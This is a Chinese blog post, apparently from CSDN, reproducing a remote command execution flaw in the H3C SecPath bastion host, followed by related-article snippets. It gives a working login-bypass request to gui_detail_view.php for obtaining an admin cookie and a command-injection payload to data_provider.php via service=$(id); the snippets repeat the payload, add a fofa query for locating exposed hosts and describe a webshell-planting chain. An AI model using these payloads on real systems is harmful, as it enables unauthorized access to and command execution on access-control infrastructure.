H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞

最新推荐文章于 2024-05-16 17:12:22 发布
最新推荐文章于 2024-05-16 17:12:22 发布
阅读量840 收藏 1
点赞数 1
分类专栏: 渗透测试 漏洞复现 文章标签: H3C SecParh堡垒机 远程命令执行漏洞 H3C堡垒机漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/118404987
版权

0x00 前言

H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令,漏洞类似于齐治堡垒机

0x01 影响范围

H3C SecParh堡垒机

0x02 漏洞复现

先通过任意用户登录获取Cookie

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

命令执行payload:(id–>command)

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true

转载请注明:Adminxe's Blog » H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞

Adminxe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
齐治堡垒机任意用户登录漏洞
maverickpig的博客
01-23 3944
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力! 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。 漏洞说明 浙江齐
齐治运维堡垒机后台命令执行漏洞
qq_44657899的博客
06-26 1945
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞 漏洞影响 H3C SecParh堡垒机 漏洞复现 fofa语法: app="H3C-SecPath-运维审计系统" 先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
最新发布
2401_84264583的博客
05-16 393
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(1)payload利用地址:/goform/aspForm。H3C多系列路由器存在前台RCE漏洞。因篇幅有限,仅展示部分资料。
h3c多系列路由器存在任意用户登录漏洞
m0_49025459的博客
08-28 2960
也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后,账户一般都是admin。根据根据系统名修改payload。发送请求包,获取管理员账号密码。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3359
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
HW第二天:0day快递盒在线送day
weixin_41489908的博客
09-12 322
截止到2020年9月12日:0day清单 转自F11Team 齐治堡垒机前台远程命令执行漏洞 漏洞利用: 利用条件:无需登录: 第一 http://10.20.10.11/listener/cluster_manage.php 返回“OK”。 第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马 /var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为
MySQL_Data_Provider_for_DotNet.zip_.net sql_MySQL Data Provider_
09-23
`MySQLClient`可能是项目的源代码目录,包含相关的C#或VB.NET文件,这些文件实现了MySQL Data Provider的核心功能,如连接管理、命令执行、数据适配器等。 `DLL`文件通常是动态链接库,这里可能包含编译好的MySQL ...
RTL8111H(S)-CG_Datasheet_1.5.pdf
06-21
RTL8111H,是瑞昱的一款千兆以太网卡,PCI-e 接口,与RTL8111F相比,引脚减少,外围电路简单,不需要外部EEPROM,MAC地址烧写更加方便,由于RTL8111F面临停产,RTL8111H可以作为一个替代方案,满足基本需求;
perl-Data-Dumper-2.145-3.el7.x86_64.rpm
09-20
RHEL 7.1安装MySQL 5.6的依赖包:perl-Data-Dumper-2.145-3.el7.x86_64.rpm ------------------------------------------------------------------------------------
ippicv_2017u3_lnx_intel64_general_20180518.tgz
06-20
IPPIW(Intel Performance Primitives for Image and Weighted Data)则是另一个与图像处理相关的库,它提供了一些基础的数学运算和权重处理功能,这些功能在图像处理和计算机视觉算法中经常被用到,如矩阵运算、...
齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
aijin3040的博客
07-17 3812
一、基本信息 参考:https://www.cnvd.org.cn/flaw/show/1559039 补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 二、漏洞挖掘过程 这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。 1、挖掘过程 首先,在安装齐治运维堡...
学习笔记-常见安全设备渗透方法
人饭子的博客
10-30 1268
SecDevice - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 身份与访问控制 堡垒机 IMC 网络检测与响应 蜜罐 IDS 防火墙 WAF 网关 负载均衡 VPN 终端响应与检测 杀软 EDR 数据防泄漏系统 身份与访问控制 堡垒机 齐治堡垒机 Fofa: app...
齐治堡垒机某版本任意用户登录漏洞复现
ranuy阮的博客
05-20 3123
漏洞点 /audit/gui_detail_view.php poc /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm fofa app="齐治科技-堡垒机" 验证 URL https://xx.xx.xx.xx/audit/gui_detail_view.php?to
mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明
weixin_39759589的博客
02-02 628
尊敬的用户:齐治科技(下述简称“齐治”)注意到近期有消息称“齐治堡垒机存在未修复的前台远程代码执行漏洞”。经过确认,消息提及的漏洞齐治已停售产品Shterm的已修复漏洞,请仍在使用Shterm堡垒机的用户及时升级至最新版本。详细情况如下。//消息来源一网上流传一张涉及齐治堡垒机的图片(其他厂家信息已做模糊处理)。可以看到该信息非常简单,所述漏洞缺少细节,并且把“齐治”写成“奇治”,可采信度很低...
红队中的一些重点系统漏洞整理(通用的一些漏洞
qq_50854662的博客
02-20 765
红队中的一些重点系统漏洞整理(通用的一些漏洞
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3350
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
data_provider.py文件是用来干嘛的
05-13
`data_provider.py` 文件通常是用来提供数据的,它包含用于读取,预处理和转换数据的函数和类。在训练机器学习模型时,通常需要从数据集中加载数据,并将其转换为可以输入到模型的格式。`data_provider.py` 文件的目的就是为了实现这些功能,以便训练模型所需的数据能够被有效地获取和使用。例如,它可以包含从文件中读取数据,对数据进行预处理和清理的函数,以及将数据转换为模型所需格式的函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值